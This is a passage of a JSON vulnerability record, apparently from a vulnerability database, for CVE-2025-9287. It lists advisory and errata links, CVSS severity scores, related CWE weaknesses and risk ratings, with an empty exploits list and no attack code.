"https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9287", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "9.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9287" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111772", "reference_id": "1111772", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111772" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2389932", "reference_id": "2389932", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2389932" }, { "reference_url": "https://github.com/advisories/GHSA-cpq7-6gpm-g9rc", "reference_id": "GHSA-cpq7-6gpm-g9rc", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cpq7-6gpm-g9rc" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:14767", "reference_id": "RHSA-2025:14767", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:14767" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:15847", "reference_id": "RHSA-2025:15847", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:15847" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:16020", "reference_id": "RHSA-2025:16020", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:16020" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:18278", "reference_id": "RHSA-2025:18278", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:18278" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:18744", "reference_id": "RHSA-2025:18744", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:18744" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:22905", "reference_id": "RHSA-2025:22905", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:22905" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3710", "reference_id": "RHSA-2026:3710", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3710" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3712", "reference_id": "RHSA-2026:3712", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3712" }, { "reference_url": "https://usn.ubuntu.com/7746-1/", "reference_id": "USN-7746-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7746-1/" } ], "weaknesses": [ { "cwe_id": 20, "name": "Improper Input Validation", "description": "The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly." }, { "cwe_id": 937, "name": "OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013." }, { "cwe_id": 1035, "name": "OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities", "description": "Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017." } ], "exploits": [], "severity_range_score": "7.5 - 10.0", "exploitability": "0.5", "weighted_severity": "9.0", "risk_score": 4.5, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tt31-4d54-k7cz" }